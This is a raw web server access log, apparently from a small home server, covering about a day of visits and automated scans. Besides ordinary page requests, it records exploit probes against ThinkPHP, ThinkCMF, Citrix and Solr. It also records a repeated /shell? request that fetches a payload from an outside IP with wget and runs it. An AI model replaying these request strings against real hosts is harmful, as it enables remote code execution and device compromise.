Wed Jan 15 06:25:06 MST 2020 06:25:06 up 26 days, 21:16, 1 user, load average: 0.37, 0.26, 0.30 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 27days 31:16 4.08s /usr/bin/lxsession -s LXDE-pi -e LXDE 60.191.66.222 - - [15/Jan/2020:13:41:09 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 37.166.244.162 - - [15/Jan/2020:13:41:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" 37.166.244.162 - - [15/Jan/2020:13:41:23 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" 195.25.86.161 - - [15/Jan/2020:13:41:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:41:50 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:41:52 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:41:57 +0000] "GET /delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 200 25000 "http://162.250.19.7/delinquent-accounts/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:00 +0000] "GET /delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/Inv-529.prn HTTP/1.1" 200 1114 "http://162.250.19.7/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:12 +0000] "GET /robots.txt HTTP/1.1" 200 70 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:18 +0000] "GET /memes/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:42:28 +0000] "GET /va/ HTTP/1.1" 401 0 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:41 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:44 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:47 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:42:50 +0000] "GET /freedom/freedom/2010Website.pdf HTTP/1.1" 200 32014 "http://162.250.19.7/freedom/freedom/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:43:07 +0000] "GET /freedom/freedom/2019-12-26-Installing-thttpd.txt HTTP/1.1" 200 77413 "http://162.250.19.7/freedom/freedom/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:12 +0000] "GET /freedom/freedom-2020-01-08/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:15 +0000] "GET /freedom/freedom-2020-01-08/2020-01-08-freedom.txt HTTP/1.1" 200 2533 "http://162.250.19.7/freedom/freedom-2020-01-08/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:20 +0000] "GET /freedom/freedom-2020-01-08/freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/freedom/freedom-2020-01-08/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:43:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:43:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:43:32 +0000] "GET /documents/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:35 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:40 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:44 +0000] "GET /readme.txt HTTP/1.1" 200 247 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:43:54 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:00 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:03 +0000] "GET /ac0xl/www/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:07 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/ HTTP/1.1" 200 477 "http://162.250.19.7/ac0xl/www/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:08 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/main.htm HTTP/1.1" 200 493 "http://162.250.19.7/ac0xl/www/1999-ArchHunterBooks/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:08 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/arch.htm HTTP/1.1" 200 2340 "http://162.250.19.7/ac0xl/www/1999-ArchHunterBooks/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:08 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/images/fill.jpg HTTP/1.1" 200 1264 "http://162.250.19.7/ac0xl/www/1999-ArchHunterBooks/main.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:09 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/images/nav.jpg HTTP/1.1" 200 26915 "http://162.250.19.7/ac0xl/www/1999-ArchHunterBooks/arch.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:09 +0000] "GET /ac0xl/www/1999-ArchHunterBooks/images/collagemain.jpg HTTP/1.1" 200 89726 "http://162.250.19.7/ac0xl/www/1999-ArchHunterBooks/main.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:15 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/www/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:18 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/ HTTP/1.1" 200 5608 "http://162.250.19.7/ac0xl/www/2009-GreenRiver.UT/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:18 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/images/jwp_header.jpg HTTP/1.1" 200 11384 "http://162.250.19.7/ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:18 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/images/jwp_m_header3.jpg HTTP/1.1" 200 15458 "http://162.250.19.7/ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:18 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/www.jwprhm.com/favicon.ico HTTP/1.1" 200 1034 "" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 195.25.86.161 - - [15/Jan/2020:13:44:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.25.86.161 - - [15/Jan/2020:13:49:05 +0000] "GET /ac0xl/2010Website.pdf HTTP/1.1" 200 32014 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 37.166.244.162 - - [15/Jan/2020:13:51:50 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" 37.166.244.162 - - [15/Jan/2020:13:51:52 +0000] "GET /ac0xl/2010Website.pdf HTTP/1.1" 200 32014 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" 189.126.175.215 - - [15/Jan/2020:13:53:33 +0000] "GET / HTTP/1.1" 400 0 "" "" 45.83.64.49 - - [15/Jan/2020:15:32:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 88.38.8.98 - - [15/Jan/2020:15:59:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 97.74.237.196 - - [15/Jan/2020:16:34:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 97.74.237.196 - - [15/Jan/2020:16:34:18 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 97.74.237.196 - - [15/Jan/2020:16:34:24 +0000] "GET /memes/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 143.202.189.181 - - [15/Jan/2020:16:55:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 62.173.149.89 - - [15/Jan/2020:17:23:17 +0000] "GET / HTTP/1.1" 200 25000 "" "" 134.209.107.88 - - [15/Jan/2020:17:47:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 80.245.162.226 - - [15/Jan/2020:18:04:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 222.186.19.221 - - [15/Jan/2020:19:23:57 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 196.202.230.172 - - [15/Jan/2020:19:30:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 87.7.106.198 - - [15/Jan/2020:20:02:43 +0000] "GET / HTTP/1.1" 400 0 "" "" 51.79.101.221 - - [15/Jan/2020:20:09:12 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.79.101.221 - - [15/Jan/2020:20:09:12 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 189.168.145.233 - - [15/Jan/2020:20:32:31 +0000] "GET / HTTP/1.0" 200 25000 "" "" 27.147.170.138 - - [15/Jan/2020:21:51:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 69.162.126.238 - - [15/Jan/2020:22:16:07 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 69.162.126.238 - - [15/Jan/2020:22:16:07 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 139.162.106.181 - - [15/Jan/2020:23:16:58 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 94.102.49.193 - - [15/Jan/2020:23:22:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 94.102.49.193 - - [15/Jan/2020:23:22:11 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 94.102.49.193 - - [15/Jan/2020:23:22:15 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 94.102.49.193 - - [15/Jan/2020:23:22:17 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 94.102.49.193 - - [15/Jan/2020:23:23:05 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.10.0" 103.229.67.105 - - [15/Jan/2020:23:25:05 +0000] "GET /templets/lurd//lurd-add.htm HTTP/1.1" 404 0 "" "libwww-perl/6.43" 213.170.247.219 - - [15/Jan/2020:23:32:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 5.101.0.209 - - [16/Jan/2020:00:03:33 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [16/Jan/2020:00:05:06 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [16/Jan/2020:00:05:08 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [16/Jan/2020:00:06:51 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [16/Jan/2020:00:26:16 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 116.196.90.48 - - [16/Jan/2020:02:02:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 116.196.90.48 - - [16/Jan/2020:02:02:39 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:42 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:43 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:44 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:45 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:46 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:48 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:49 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 116.196.90.48 - - [16/Jan/2020:02:02:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 217.73.143.179 - - [16/Jan/2020:05:44:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 81.213.154.219 - - [16/Jan/2020:05:48:52 +0000] "GET / HTTP/1.1" 400 0 "" "" 99.162.153.177 - - [16/Jan/2020:06:40:39 +0000] "GET / HTTP/1.1" 400 0 "" "" 36.78.121.54 - - [16/Jan/2020:07:14:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 221.192.134.90 - - [16/Jan/2020:08:30:36 +0000] "GET / HTTP/1.1" 200 25000 "" "okhttp/3.6.0" 113.220.25.115 - - [16/Jan/2020:10:48:54 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 190.201.38.70 - - [16/Jan/2020:10:51:29 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 182.85.56.96 - - [16/Jan/2020:11:42:05 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 88.233.87.173 - - [16/Jan/2020:12:15:16 +0000] "GET / HTTP/1.1" 400 0 "" "" 18.219.233.44 - - [16/Jan/2020:12:17:36 +0000] "GET / HTTP/1.1" 200 25000 "" "" 185.152.66.235 - - [16/Jan/2020:12:21:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:21:48 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:21:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.152.66.235 - - [16/Jan/2020:12:21:57 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.152.66.235 - - [16/Jan/2020:12:22:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.152.66.235 - - [16/Jan/2020:12:22:05 +0000] "GET /documents/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.152.66.235 - - [16/Jan/2020:12:22:08 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:10 +0000] "GET /music/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:15 +0000] "GET /videos/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.152.66.235 - - [16/Jan/2020:12:22:17 +0000] "GET /va/ HTTP/1.1" 401 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 185.152.66.235 - - [16/Jan/2020:12:22:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 82.114.227.173 - - [16/Jan/2020:12:48:27 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" Thu Jan 16 06:25:05 MST 2020 06:25:06 up 27 days, 21:16, 1 user, load average: 0.31, 0.24, 0.34 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 28days 31:52 4.08s /usr/bin/lxsession -s LXDE-pi -e LXDE